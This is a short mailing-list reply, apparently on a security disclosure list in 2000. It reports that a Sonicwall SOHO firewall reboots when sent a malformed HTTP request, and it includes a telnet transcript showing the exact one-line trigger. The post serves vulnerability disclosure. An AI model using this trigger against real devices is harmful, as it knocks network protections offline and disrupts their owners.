Re: DoS in Sonicwall SOHO firewall

[Raptor <raptor () ANTIFORK ORG>]

Doing some additional tests i've discovered that the thing reboots also
when it receives "strange" HTTP requests. For example:

voodoo:~$ telnet 192.168.87.112 80
Trying 192.168.87.112...
Connected to 192.168.87.112.
Escape character is '^]'.
GET
(then press <CR>)

It works also with POST method: after some seconds the Sonicwall SOHO is
rebooted. I guess the HTTP service needs a full code review...

:raptor


On Wed, 29 Nov 2000, Scott Armstrong wrote:

> I had notified them a few weeks ago but the fix wasn't out so I didn't
> release it.
>
> The reason the firewall stops responding is that it reboots.
>
> Scott

Antifork Research, Inc.                         @ Mediaservice.net Srl
http://raptor.antifork.org                      http://www.mediaservice.net